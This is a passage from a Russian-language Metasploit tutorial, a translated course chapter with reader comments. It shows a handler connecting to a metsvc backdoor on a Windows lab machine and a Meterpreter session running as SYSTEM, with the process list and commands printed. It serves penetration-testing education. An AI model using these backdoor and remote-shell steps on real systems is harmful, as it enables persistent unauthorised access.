EXITFUNC thread yes Exit technique: seh, thread, process LPORT 31337 yes The local port RHOST 192.168.1.104 no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit
Сразу после запуска команды 'exploit', metsvc backdoor на удаленной системе произведет backconnect к нашей машине.
[*] Starting the payload handler... [*] Started bind handler [*] Meterpreter session 2 opened (192.168.1.101:60840 -> 192.168.1.104:31337) meterpreter > ps Process list ============ PID Name Path --- ---- ---- 140 smss.exe \SystemRoot\System32\smss.exe 168 csrss.exe \??\C:\WINNT\system32\csrss.exe 188 winlogon.exe \??\C:WINNT\system32\winlogon.exe 216 services.exe C:\WINNT\system32\services.exe 228 lsass.exe C:\WINNT\system32\lsass.exe 380 svchost.exe C:\WINNT\system32\svchost.exe 408 spoolsv.exe C:\WINNT\system32\spoolsv.exe 444 svchost.exe C:\WINNT\System32\svchost.exe 480 regsvc.exe C:\WINNT\system32\regsvc.exe 500 MSTask.exe C:\WINNT\system32\MSTask.exe 528 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe 564 metsvc.exe c:\WINNT\my\metsvc.exe 588 WinMgmt.exe C:\WINNT\System32\WBEM\WinMgmt.exe 676 cmd.exe C:\WINNT\System32\cmd.exe 724 cmd.exe C:\WINNT\System32\cmd.exe 764 mmc.exe C:\WINNT\system32\mmc.exe 816 metsvc-server.exe c:\WINNT\my\metsvc-server.exe 888 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 896 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 940 firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe 972 TPAutoConnSvc.exe C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe 1000 Explorer.exe C:\WINNT\Explorer.exe 1088 TPAutoConnect.exe C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe meterpreter > pwd C:\WINDOWS\system32 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
И здесь сессия Meterpreter в наших руках!
Но будьте осторожны, используя этот метод, тестируя на проникновения систему заказчика. Заказчик не будет счастлив от того, что вы оставите в системе такую полезную «потайную дверь» для потенциальных взломщиков.
На этом девятую часть курса можно считать завершенной, до встречи в следующих частях на bruteforcer.ru.
Источник:
Перевод: Э_L_A_Y
Рубрика:
Metasploit
Вот статья с сайта по тематике похожего на ваш, но подача материала не ахти.
Там указан и источник статьи. Возможно ли с точки зрения последнего Bucktruck4 переработать статью и выложить.
спасибо.
Посмотрим, хотя тема не совсем интересна, «изъезжена вдоль и поперек» :) Хотя если подготовить статью по работе с SAM файлом и хэшами средствами BackTrack, можно попробовать. Вобщем не буду загадывать.
Именно только средствами BackTrack последнего релиза.
Ударная пара Метасплоит и BackTrack и сайту цены не будет.
Замечательная статья!!! Респект Вам!!! Очень помогла постигнуть истину! Желаю Вам больше релизов и однополчан! Спасибо!
Позвольте скажу свое мнение о BackTrack…. Не согласен что он самый совершенный! Gentoo с таким оружием на борту в разыыы сильнее и стабильнее! Хотя не осуждайте Линь для каждого свой!
Спасибо вам за отзыв, но я всего лишь перевел оригинал, как смог :). Жаль, что немного не хватило времени перевести весь курс до конца, но думаю вскоре как нибудь выделю, там немного осталось.
Спасибо! Буду ждать Ваших статей! Очень грамотно переведены!